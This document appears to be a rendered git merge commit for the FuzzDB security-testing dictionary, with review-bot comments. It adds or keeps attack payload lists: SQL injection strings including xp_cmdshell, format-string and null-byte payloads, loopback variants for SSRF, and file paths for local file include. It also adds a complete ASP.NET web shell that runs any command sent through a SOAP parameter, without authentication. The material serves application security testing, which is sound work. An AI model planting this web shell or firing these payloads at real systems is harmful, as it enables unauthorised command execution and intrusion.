Merge branch 'master' into patch-9

Adam Muntner 2019-10-15 15:26:43 -04:00 committed by GitHub
commit 77f572aa7c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
28 changed files with 71783 additions and 1367 deletions

.gitignore

@ -0,0 +1 @@
*.DS_Store

@ -1,4 +1,8 @@
FuzzDB was created to increase the likelihood of causing and identifying conditions of security interest through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses. _____________________________________
FYI: The /web-backdoors folder may trigger anti-virus scanners.
_____________________________________
FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses.
**Attack Patterns -** **Attack Patterns -**
FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing. FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing.
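
Review bot: The new antivirus FYI at the top of the README repeats what the existing "Note: Some antivirus/antimalware software will alert on FuzzDB" paragraph further down already covers, and it is set off with underscore rules rather than the Markdown emphasis used elsewhere in the file. Fold the /web-backdoors detail into the existing note, or make the top line a one-line pointer to it, so the two statements cannot drift apart.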
@ -64,20 +68,22 @@ Other security tools and projects that incorporate FuzzzDB in whole or part
**Preferred method is to check out sources via git, new payloads are added frequently** **Preferred method is to check out sources via git, new payloads are added frequently**
``` ```
git clone https://github.com/fuzzdb-project/fuzzdb.git git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1
``` ```
While in the FuzzDB dir, you can update your local repo with the command While in the FuzzDB dir, you can update your local repo with the command
``` ```
git pull git pull
``` ```
You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip) This Stackoverflow gives ideas on how to keep your local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595
You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip)
Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system.
### Who ### ### Who ###
FuzzDB was created by Adam Muntner (amuntner @ gmail.com) FuzzDB was created by Adam Muntner (amuntner @ gmail.com)
FuzzDB (c) Copyright Adam Muntner, 2010-2017 FuzzDB (c) Copyright Adam Muntner, 2010-2019
Portions copyrighted by others, as noted in commit comments and README.md files. Portions copyrighted by others, as noted in commit comments and README.md files.
The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know. The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know.
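
Review bot: The clone command now carries `--depth 1`, but the surrounding text never says that this produces a shallow clone without history, which is the only reason the new Stack Overflow sentence makes sense. Add one sentence saying so, and turn the bare URL into a Markdown link with descriptive text like the other links in this section; "This Stackoverflow gives ideas on how to keep your local repository tidy" reads as a fragment.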

@ -1,4 +1,4 @@
Copyright (c) 2010-2017, Adam Muntner Copyright (c) 2010-2019, Adam Muntner
All rights reserved. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

@ -0,0 +1,4 @@
php_magic_hashes.fuzz.txt - See, https://www.whitehatsec.com/blog/magic-hashes/
"the following “magic” strings are substantially more likely to evaluate to true when hashed given a completely random hash..."

@ -0,0 +1,24 @@
00e00099
00e05651056780370631793326323796
00e1839085851394356611454660337505469745
00e2521569708250889666329543741175098562
00e38549671092424173928143648452
00e4706040169225543861400227305532507173
0e015339760548602306096794382326
0e01697014920826425936632356870426876167
0e074025
0e07766915004133176347055865026311692244
0e251331818775808475952406672980
0e266546927425668450445617970135
0e316321729023182394301371028665
0e34042599806027333661050958199580964722
0e462097431906509019562988736854
0e4868841162506296635201967091461310754872302741
0e495317064156922585933029613272
0e591528
0e684322
0e69173478833895223726165786906905141502
0e73845709713699
0e817678
0e908730200858058999593322639865
0e9108479697641294204710754930487725109982883677
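
Review bot: The entries mix lengths from 8 to 48 characters and two prefixes (`0e` and `00e`) with no indication of which digest length or algorithm each one is meant to match, and the accompanying README only quotes a truncated sentence from the blog post. Group the values by length or add a per-length key to that README so a tester can pick the ones relevant to the hash in use. The same README is the place to state the defensive takeaway: a strict comparison (`===` or `hash_equals`) on the application side makes the whole list inert.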

@ -54,3 +54,10 @@ u"\u0000"
%FE%80%80%80%80%80%80 %FE%80%80%80%80%80%80
<EFBFBD> <EFBFBD>
%2500
%252500
%25252500
%25%30%30
\x%30%30
%%30%30
%25%2530%2530

@ -0,0 +1,9 @@
TRUE
true
1
-1
4294967295
0xFFFFFFFF
\FFFFFFFF
\FFFFFFFF\
\xFFFFFFFF
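
Review bot: This new file has no README entry saying what it targets, and it mixes two ideas: boolean-true literals (`TRUE`, `true`, `1`) and all-ones 32-bit values (`-1`, `4294967295`, `0xFFFFFFFF`). The `\FFFFFFFF` and `\FFFFFFFF\` entries do not correspond to an escape form that is obvious from the file itself. A README line naming the intended consumer would help, and splitting the two groups would keep result triage simpler.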

@ -55,3 +55,13 @@ ppppp%x
ppppp%n ppppp%n
%@ %@
%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@
%*
%*p
%*x
%*s
%*S
%*$*
%*$*p
%*$*x
%*$*s
%*$*S

@ -11,3 +11,12 @@
7F000001 7F000001
7F000002 7F000002
localhost localhost
0177.1
0177.2
0177.0.1
0177.0.2
017700000001
017700000002
0x7F000001
0x7F000002
0X07f.0.0.1
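
Review bot: Every added form comes as a .1/.2 pair except the last one: `0X07f.0.0.1` has no `.2` counterpart and is the only mixed-case hex entry. Add the matching line or drop the pairing convention. For anyone using this list to regression-test a loopback or SSRF filter, the variety here is also the argument for running the check on the parsed address rather than on the string.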

@ -31,3 +31,22 @@
/var/log/error.log /var/log/error.log
/var/log/nginx/error.log /var/log/nginx/error.log
/var/log/nginx/access.log /var/log/nginx/access.log
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
/opt/bitnami/apache2/logs/access_log
/opt/bitnami/apache2/logs/error_log
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/apache2/error.log
/var/log/apache2/access.log
/var/log/httpd-error.log
/var/log/httpd-access.log
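
Review bot: The new `/var/log/httpd/...` and `/var/log/apache2/...` entries are appended after the `/opt/...` block instead of next to the existing `/var/log/...` lines visible in the context, so the file is no longer grouped by location. Regroup them, and check the first 30 lines of the file (not shown in this hunk) for duplicates of `/var/log/apache2/error.log` and `/var/log/apache2/access.log` before merging.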

File diff suppressed because it is too large

@ -29,13 +29,3 @@ benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))# 1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))# ")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))# ')) or benchmark(10000000,MD5(1))#
pg_sleep(__TIME__)--
1 or pg_sleep(__TIME__)--
" or pg_sleep(__TIME__)--
' or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
") or pg_sleep(__TIME__)--
') or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
")) or pg_sleep(__TIME__)--
')) or pg_sleep(__TIME__)--
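
Review bot: This hunk only deletes the ten `pg_sleep(__TIME__)` lines, and nothing visible in the rest of the commit shows where they went. If they were moved to a PostgreSQL-specific file (several diffs on this page are suppressed as too large), say so in the commit message; if not, the time-based PostgreSQL cases are lost. Separating them from the `benchmark(10000000,MD5(1))` lines is reasonable, since those use a fixed count while these carried a `__TIME__` placeholder that a consumer has to substitute.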

@ -1,13 +1,9 @@
; --
'; --
'); --
'; exec master..xp_cmdshell 'ping 10.10.1.2'-- '; exec master..xp_cmdshell 'ping 10.10.1.2'--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users;
' ; drop table temp --
'exec sp_addlogin 'name' , 'password' --
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
' grant connect to name; grant resource to name; -- ' grant connect to name; grant resource to name; --
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) ' or 1=1 --
' or 1=1 --
' union (select @@version) -- ' union (select @@version) --
' union (select NULL, (select @@version)) -- ' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) --
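
Review bot: Going by the line counts in the header (13 lines before, 9 after), the state-changing entries (`create user`, `drop table temp`, `sp_addlogin`, `sp_addsrvrolemember`, the `insert into mysql.user` line) are removed, yet `exec master..xp_cmdshell 'ping 10.10.1.2'` and `grant connect to name; grant resource to name;` stay as context. If the goal is a detection-only list that is safe to run against a live database, those two should go as well or move to a file whose name marks it as intrusive; otherwise the commit message should state the criterion used.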

@ -1,5 +1,7 @@
< <
%3C %3C
%253C
%25253C
&lt &lt
&lt; &lt;
&LT &LT

@ -0,0 +1,289 @@
aaa://
aaas://
about://
acap://
acct://
acr://
adiumxtra://
afp://
afs://
aim://
appdata://
apt://
attachment://
aw://
barion://
beshare://
bitcoin://
bitcoincash://
blob://
bolo://
browserext://
callto://
cap://
chrome://
chrome-extension://
cid://
coap://
coap+tcp://
coap+ws://
coaps://
coaps+tcp://
coaps+ws://
com-eventbrite-attendee://
content://
conti://
crid://
cvs://
data://
dav://
diaspora://
dict://
did://
dis://
dlna-playcontainer://
dlna-playsingle://
dns://
dntp://
dtn://
dvb://
ed2k://
elsi://
example://
facetime://
fax://
feed://
feedready://
file://
filesystem://
finger://
fish://
ftp://
geo://
gg://
git://
gizmoproject://
go://
gopher://
graph://
gtalk://
h323://
ham://
hcap://
hcp://
http://
https://
hxxp://
hxxps://
hydrazone://
iax://
icap://
icon://
im://
imap://
info://
iotdisco://
ipn://
ipp://
ipps://
irc://
irc6://
ircs://
iris://
iris.beep://
iris.lwz://
iris.xpc://
iris.xpcs://
isostore://
itms://
jabber://
jar://
jms://
keyparc://
lastfm://
ldap://
ldaps://
lvlt://
magnet://
mailserver://
mailto://
maps://
market://
message://
microsoft.windows.camera://
microsoft.windows.camera.multipicker://
microsoft.windows.camera.picker://
mid://
mms://
modem://
mongodb://
moz://
ms-access://
ms-browser-extension://
ms-drive-to://
ms-enrollment://
ms-excel://
ms-gamebarservices://
ms-gamingoverlay://
ms-getoffice://
ms-help://
ms-infopath://
ms-inputapp://
ms-lockscreencomponent-config://
ms-media-stream-id://
ms-mixedrealitycapture://
ms-officeapp://
ms-people://
ms-project://
ms-powerpoint://
ms-publisher://
ms-restoretabcompanion://
ms-screenclip://
ms-screensketch://
ms-search://
ms-search-repair://
ms-secondary-screen-controller://
ms-secondary-screen-setup://
ms-settings://
ms-settings-airplanemode://
ms-settings-bluetooth://
ms-settings-camera://
ms-settings-cellular://
ms-settings-cloudstorage://
ms-settings-connectabledevices://
ms-settings-displays-topology://
ms-settings-emailandaccounts://
ms-settings-language://
ms-settings-location://
ms-settings-lock://
ms-settings-nfctransactions://
ms-settings-notifications://
ms-settings-power://
ms-settings-privacy://
ms-settings-proximity://
ms-settings-screenrotation://
ms-settings-wifi://
ms-settings-workplace://
ms-spd://
ms-sttoverlay://
ms-transit-to://
ms-useractivityset://
ms-virtualtouchpad://
ms-visio://
ms-walk-to://
ms-whiteboard://
ms-whiteboard-cmd://
ms-word://
msnim://
msrp://
msrps://
mtqp://
mumble://
mupdate://
mvn://
news://
nfs://
ni://
nih://
nntp://
notes://
ocf://
oid://
onenote://
onenote-cmd://
opaquelocktoken://
openpgp4fpr://
pack://
palm://
paparazzi://
pkcs11://
platform://
pop://
pres://
prospero://
proxy://
pwid://
psyc://
qb://
query://
redis://
rediss://
reload://
res://
resource://
rmi://
rsync://
rtmfp://
rtmp://
rtsp://
rtsps://
rtspu://
secondlife://
service://
session://
sftp://
sgn://
shttp://
sieve://
simpleledger://
sip://
sips://
skype://
smb://
sms://
smtp://
snews://
snmp://
soap.beep://
soap.beeps://
soldat://
spiffe://
spotify://
ssh://
steam://
stun://
stuns://
submit://
svn://
tag://
teamspeak://
tel://
teliaeid://
telnet://
tftp://
things://
thismessage://
tip://
tn3270://
tool://
turn://
turns://
tv://
udp://
unreal://
urn://
ut2004://
v-event://
vemmi://
ventrilo://
videotex://
vnc://
view-source://
wais://
webcal://
wpid://
ws://
wss://
wtai://
wyciwyg://
xcon://
xcon-userid://
xfire://
xmlrpc.beep://
xmlrpc.beeps://
xmpp://
xri://
ymsgr://
z39.50://
z39.50r://
z39.50s://
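
Review bot: Appending `://` to every entry does not match how schemes without an authority component are written, such as `mailto`, `tel`, `sms`, `urn`, `data`, `geo` and `magnet`, and `hxxp://` / `hxxps://` are defanging notation rather than schemes. Consider storing bare scheme names and letting the consumer add the separator, or document that the uniform suffix is deliberate. The list is also slightly out of order (`pwid` before `psyc`, `vnc` before `view-source`, `ms-project` before `ms-powerpoint`), which makes later additions harder to diff.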

@ -0,0 +1,48 @@
# this list can be used to enumerate supported Web Socket sub protocols of a web socket server
# It conyains the official IANA registerd Web Socket sub protocols
# Source: https://www.iana.org/assignments/websocket/websocket.xml
# Example subprotocol request header:
# Sec-WebSocket-Protocol: mqtt, wamp
# The Web Socket client can include a list of the protocols when making the initial HTTP request.
# The server is then required to either select one of those protocols and include it in a response header.
# If none of the sub protocols send by the client are supported by the server,
# the server shoud fail the handshake and terminate the connection.
MBWS.huawei.com
MBLWS.huawei.com
soap
wamp
v10.stomp
v11.stomp
v12.stomp
ocpp1.2
ocpp1.5
ocpp1.6
ocpp2.0
rfb
sip
notificationchannel-netapi-rest.openmobilealliance.org
wpcp
amqp
mqtt
jsflow
rwpcp
xmpp
ship
mielecloudconnect
v10.pcp.sap.com
msrp
v1.saltyrtc.org
TLCP-2.0.0.lightstreamer.com
bfcp
sldp.softvelum.com
opcua+uacp
opcua+uajson
v1.swindon-lattice+json
v1.usp
mles-websocket
coap
TLCP-2.1.0.lightstreamer.com
sqlnet.oracle.com
oneM2M.R2.0.json
oneM2M.R2.0.xml
oneM2M.R2.0.cbor
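
Review bot: The header comment has several typos ("conyains", "registerd", "shoud", "send by the client") and an "either" with no alternative in "required to either select one of those protocols". More important for consumers, the file starts with nine `#` comment lines, so any tool that reads it line by line will send those as subprotocol names unless it strips comments; state that in the README or move the explanation there. A retrieval date next to the IANA source URL would show how current the list is.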

@ -0,0 +1,101 @@
account
accounts
active
activity
apikey
balance
block
blocks
calendar
category
change
check
close
coins
company
create
crypto
current
deposits
domain
domain
event
events
export
favorite
feature
file
fills
forecast
funding
glass
global
heartbeat
history
holds
holiday
hosts
in
indicators
ingredient
ipv4
ipv6
latestblock
ledger
list
lookup
malware
matches
messages
multiaddress
nids
orders
out
payment
phishing
position
price
product
products
profile
profiles
pulses
query
rate
rawblock
recipe
related
repay
report
rescan
scan
scan
search
section
self
send
spam
status
style
subscribed
suggest
threats
ticker
time
today
tomorrow
transaction
try
tx
type
types
url
user
users
validate
verify
version
version
volume
withdrawals
yesterday
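
Review bot: The list contains exact duplicates: `domain`, `scan` and `version` each appear twice on consecutive lines. Remove the repeats; the file is otherwise in alphabetical order, and the line count in the header drops from 101 to 98.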

@ -1,3 +1,6 @@
한국
ไทย
ଭାରତ
ac ac
ad ad
ae ae
@ -49,6 +52,7 @@ cl
cm cm
cn cn
co co
country
cr cr
cu cu
cv cv
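
Review bot: `country` is inserted between `co` and `cr` in a list whose visible entries are otherwise two-letter codes and native-script country names. If it is meant as the generic TLD, it belongs in a gTLD list; if it is a stray header or placeholder, drop it.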
@ -56,7 +60,6 @@ cw
cx cx
cy cy
cz cz
dd
de de
dj dj
dk dk
@ -251,7 +254,60 @@ wf
ws ws
ye ye
yt yt
yu
za za
zm zm
zw zw
ایران‎
ڀارت‎
الاردن‎
الجزائر‎
السعودية‎
المغرب‎
امارات‎
بھارت‎
بارت‎
پاکستان‎
تونس‎
سودان‎
سورية‎
عراق‎
عمان‎
فلسطين‎
قطر‎
مصر‎
مليسيا‎
موريتانيا‎
ελ
бг
бел
ею
қаз
мкд
мон
рф
срб
укр
հայ
გე
भारत
भारतम्
भारोत
ભારત
భారత్
ਭਾਰਤ
ಭಾರತ
இந்தியா
இலங்கை
சிங்கப்பூர்
ഭാരതം
বাংলা
ভারত
ভাৰত
ලංකා
中国
中國
台湾
台灣
新加坡
澳門
香港
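
Review bot: The internationalized entries are added in native script only. Most resolvers and HTTP clients need the `xn--` A-label form on the wire, so add those forms alongside or state in the README that the consumer must IDNA-encode each line. Also check the right-to-left entries for trailing invisible directionality marks picked up by copy and paste, which would make a line fail exact-match lookups, and move the three IDN entries that the first hunk put at the top of the file into this block.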

File diff suppressed because it is too large

@ -47,5 +47,6 @@
/.htpasswd /.htpasswd
/.nsconfig /.nsconfig
/.passwd /.passwd
/.viminfo
/.www_acl /.www_acl
/.wwwacl /.wwwacl

File diff suppressed because it is too large

@ -6,8 +6,9 @@ bak
sav sav
~ ~
copy copy
old
orig orig
tmp tmp
txt txt
back back
swp
rej

@ -161,7 +161,9 @@ dm2
dmo dmo
dmsk dmsk
dnc dnc
doc
dockzip dockzip
docx
dp1 dp1
dpn dpn
dpx dpx

@ -16,6 +16,7 @@ admin/adminLogin.html
admin/adminLogin.htm admin/adminLogin.htm
admin/admin_login.html admin/admin_login.html
admin/controlpanel.html admin/controlpanel.html
admin/index.html
admin/admin-login.html admin/admin-login.html
admin-login.html admin-login.html
admin/account.html admin/account.html

@ -1,5 +1,6 @@
/@download@ /@download@
/AdapterFramework/version/version.jsp /AdapterFramework/version/version.jsp
/AdminTools
/AdminTools/ /AdminTools/
/Adobe /Adobe
/AdobeDocumentServices/Config /AdobeDocumentServices/Config
@ -27,24 +28,29 @@
/bcb/bcbadmSystemInfo.jsp /bcb/bcbadmSystemInfo.jsp
/bcbtest/start.jsp /bcbtest/start.jsp
/BI_UDC /BI_UDC
/BizcCommLayerAuthoring/Config?wsdl
/BizcCommLayerAuthoring/Config1 /BizcCommLayerAuthoring/Config1
/BizcCommLayerAuthoring/Config1?wsdl /BizcCommLayerAuthoring/Config1?wsdl
/BizcCommLayerAuthoring/Config?wsdl
/BOE
/BusinessProcessBI
/bwtest /bwtest
/caf /caf
/CAFDataService/Config /CAFDataService/Config
/CAFDataService/Config?wsdl /CAFDataService/Config?wsdl
/ccsui /ccsui
/clientapi
/CmcApp/logon.faces /CmcApp/logon.faces
/CMSRTS/Config?wsdl /CMCDoc
/CMSRTS/Config1 /CMSRTS/Config1
/CMSRTS/Config1?wsdl /CMSRTS/Config1?wsdl
/CMSRTS/Config?wsdl
/com~tc~lm~webadmin~httpprovider~web /com~tc~lm~webadmin~httpprovider~web
/CrystalReports/viewrpt.cwr /CrystalReports/viewrpt.cwr
/ctc /ctc
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
/DataArchivingService /DataArchivingService
/dispatcher /dispatcher
/docs
/dswsbobje /dswsbobje
/dswsbobje/services/BICatalog?wsdl /dswsbobje/services/BICatalog?wsdl
/dswsbobje/services/listServices /dswsbobje/services/listServices
@ -56,6 +62,7 @@
/GRMGWSTest/service /GRMGWSTest/service
/GRMGWSTest/service?wsdl /GRMGWSTest/service?wsdl
/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a /guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
/host-manager
/htmlb/ /htmlb/
/htmlb/docs/api/index.html /htmlb/docs/api/index.html
/htmlb/index.html /htmlb/index.html
@ -120,9 +127,12 @@
/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet /logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp /logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
/main.html /main.html
/manager
/meSync/HttpGRMGTest.html /meSync/HttpGRMGTest.html
/mmr/ /mmr/
/mmr/mmr/MMRUI.html /mmr/mmr/MMRUI.html
/MobileBIService
/MOBIServer
/Modeler /Modeler
/modeller/ /modeller/
/modeller/index.html /modeller/index.html
@ -139,6 +149,7 @@
/rep/build_info.html /rep/build_info.html
/rep/build_info.jsp /rep/build_info.jsp
/rep/start/index.jsp /rep/start/index.jsp
/ROOT
/run/build_info.html /run/build_info.html
/run/build_info.jsp /run/build_info.jsp
/rwb/version.html /rwb/version.html
@ -438,9 +449,9 @@
/webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator /webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
/webdynpro/resources/sap.com/ /webdynpro/resources/sap.com/
/webdynpro/welcome/Welcome.jsp /webdynpro/welcome/Welcome.jsp
/WSConnector/Config?wsdl
/WSConnector/Config1 /WSConnector/Config1
/WSConnector/Config1?wsdl /WSConnector/Config1?wsdl
/WSConnector/Config?wsdl
/wsd2wsdl /wsd2wsdl
/wsnavigator /wsnavigator
/wsnavigator/jsps/index.jsp /wsnavigator/jsps/index.jsp

@ -0,0 +1,88 @@
<%--
Usage:
POST /test.asmx HTTP/1.1
Host: example.com
Content-Type: text/xml; charset=utf-8
Content-Length: 363
SOAPAction: "http://tempuri.org/Test"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Test xmlns="http://tempuri.org/">
<Z1>cmd.exe</Z1>
<Z2>/c net user</Z2>
</Test>
</soap:Body>
</soap:Envelope>
--%>
<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Data;
using System.Data.SqlClient;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web.SessionState;
using System.Web.Services;
using System.Xml;
using System.Web.Services.Protocols;
[WebService(Namespace = "http://www.payloads.online/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class New_Process :Process
{
public New_Process(string s)
{
}
}
public class Service : System.Web.Services.WebService
{
public Service()
{
}
[WebMethod]
public string Test(string Z1,string Z2)
{
String R;
ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
Process e = new New_Process("something");
StreamReader OT, ER;
c.UseShellExecute = false;
c.RedirectStandardOutput = true;
c.RedirectStandardError = true;
e.StartInfo = c;
e.Start();
OT = e.StandardOutput;
ER = e.StandardError;
e.Close();
R = OT.ReadToEnd() + ER.ReadToEnd();
HttpContext.Current.Response.Clear();
HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
HttpContext.Current.Response.Write("<data>");
HttpContext.Current.Response.Write("<![CDATA[");
HttpContext.Current.Response.Write("\x2D\x3E\x7C");
HttpContext.Current.Response.Write(R);
HttpContext.Current.Response.Write("\x7C\x3C\x2D");
HttpContext.Current.Response.Write("]]>");
HttpContext.Current.Response.Write("</data>");
HttpContext.Current.Response.End();
return R;
}
}
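
Review bot: The file has no provenance or license line, although the README says portions copyrighted by others are noted in commit comments and README.md files; add the source and a one-line description to the folder's README.md. That entry is also the place to record what defenders can match on: the `Test` web method passes the `Z1` and `Z2` SOAP parameters straight to `ProcessStartInfo` with no authentication, and the response wraps the output in the fixed `->|` and `|<-` markers inside a `<data><![CDATA[` block, both of which are stable indicators for web-server and proxy log rules.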

@ -0,0 +1,986 @@
103.20.188.35
103.20.188.83
103.22.248.62
103.3.46.105
106.186.17.181
106.51.255.133
109.69.8.34
109.69.8.51
110.170.117.15
110.76.151.17
114.114.114.114
114.114.114.119
114.114.115.115
114.114.115.119
115.68.100.102
115.68.100.103
115.68.62.210
115.68.62.222
115.85.69.162
117.102.224.154
117.102.224.230
119.160.208.251
119.160.208.252
119.18.159.222
119.252.167.229
121.152.231.196
121.194.2.2
12.127.16.67
12.127.17.72
121.52.206.130
121.52.87.128
122.0.0.12
122.155.12.41
122.155.167.38
122.155.167.70
122.155.3.119
122.210.229.161
122.255.96.132
124.107.135.126
1.2.4.8
128.199.248.105
129.250.35.250
129.250.35.251
129.7.1.1
129.7.1.6
130.180.228.2
131.155.140.130
131.191.7.12
134.48.1.32
134.60.1.111
137.82.1.1
139.0.27.186
139.130.4.4
139.175.55.244
141.1.1.1
141.1.27.249
141.211.125.15
141.211.125.17
141.211.144.15
141.211.144.17
142.103.1.1
142.46.1.130
142.46.128.130
144.76.202.253
147.235.250.2
147.235.251.3
147.29.10.55
147.29.10.6
148.233.151.6
148.233.151.8
148.243.65.17
149.156.64.210
149.211.153.50
151.11.85.5
152.99.1.10
152.99.200.6
152.99.78.136
153.19.1.254
158.43.128.1
158.43.128.72
158.43.192.1
158.43.240.3
158.43.240.4
159.90.200.7
160.7.240.20
164.124.101.2
164.124.107.9
165.166.142.42
165.21.100.88
165.21.83.88
165.87.13.129
165.87.201.244
168.126.63.1
168.188.1.1
168.213.3.10
168.213.3.11
168.215.165.186
168.215.210.50
168.95.1.1
170.51.255.100
170.56.58.53
173.44.32.2
174.34.129.34
178.151.86.169
178.161.146.10
178.254.21.113
180.211.129.42
185.46.7.100
185.46.7.110
187.115.52.83
187.73.241.67
189.90.16.20
190.11.32.199
192.116.16.26
192.172.250.8
192.190.173.40
192.43.161.22
192.76.144.66
193.101.111.10
193.111.144.145
193.111.144.161
193.111.200.191
193.111.238.5
193.138.78.117
193.142.218.3
193.148.29.100
193.148.29.103
193.151.32.40
193.16.255.2
193.17.213.10
193.189.114.254
193.200.68.230
193.201.185.3
193.205.136.1
193.22.119.195
193.226.128.129
193.226.61.1
193.228.86.5
193.230.161.3
193.230.161.4
193.230.183.201
193.230.230.1
193.231.112.1
193.231.249.1
193.231.80.7
193.232.69.22
193.252.247.52
193.252.247.53
193.254.232.1
193.255.146.53
193.26.6.130
193.27.192.98
193.33.114.2
193.33.220.3
193.33.236.1
193.41.10.1
193.41.59.151
193.43.108.3
193.43.108.62
193.43.17.4
193.58.204.59
193.58.251.251
193.67.79.39
193.78.240.12
193.86.86.2
193.89.221.124
193.89.221.2
193.89.248.1
193.95.93.243
193.95.93.77
194.102.106.1
194.113.160.68
194.1.154.37
194.117.245.2
194.12.224.34
194.126.130.7
194.132.119.151
194.132.32.32
194.141.12.1
194.141.45.4
194.145.147.194
194.145.240.6
194.146.136.1
194.149.133.11
194.149.146.2
194.149.156.140
194.150.168.168
194.153.232.17
194.158.206.205
194.158.206.206
194.164.181.2
194.169.239.10
194.169.244.33
194.169.244.34
194.172.160.4
194.179.109.10
194.179.1.100
194.18.231.5
194.187.164.20
194.190.225.2
194.20.0.24
194.213.193.5
194.226.211.11
194.246.126.68
194.246.127.11
194.250.223.1
194.250.223.2
194.25.0.52
194.25.0.60
194.39.185.10
194.50.10.2
194.52.202.98
194.54.181.90
194.6.240.1
194.72.9.61
194.75.147.212
194.77.8.1
194.88.202.11
194.88.203.6
194.98.65.165
195.112.96.34
195.113.144.194
195.114.173.153
195.12.4.247
195.129.12.114
195.129.12.122
195.129.12.83
195.13.38.3
195.137.162.149
195.140.236.250
195.140.236.253
195.14.50.21
195.146.81.130
195.153.19.10
195.153.19.5
195.158.239.4
195.167.98.3
195.170.96.2
195.170.97.254
195.175.121.10
195.175.39.39
195.175.39.40
195.177.223.3
195.177.240.3
195.178.123.130
195.182.110.132
195.182.192.10
195.182.192.2
195.186.1.110
195.186.1.111
195.186.4.110
195.186.4.111
195.189.130.1
195.189.131.1
195.198.214.72
195.20.193.11
195.2.195.1
195.22.192.252
195.24.228.3
195.243.214.4
195.244.25.3
195.245.76.6
195.27.1.1
195.35.110.4
195.5.125.3
195.60.70.5
195.67.15.102
195.67.15.73
195.67.160.3
195.67.27.18
195.69.65.98
195.70.237.42
195.70.248.1
195.74.128.6
195.7.64.3
195.88.84.100
195.96.208.1
195.99.66.220
196.41.225.11
198.60.22.2
198.82.247.34
199.249.18.1
199.249.19.2
199.44.194.2
199.80.64.202
200.113.185.227
200.118.2.88
200.175.3.232
200.221.11.100
200.221.11.101
200.221.137.40
200.221.137.41
200.221.137.42
200.221.137.43
200.221.137.44
200.221.137.45
200.221.137.46
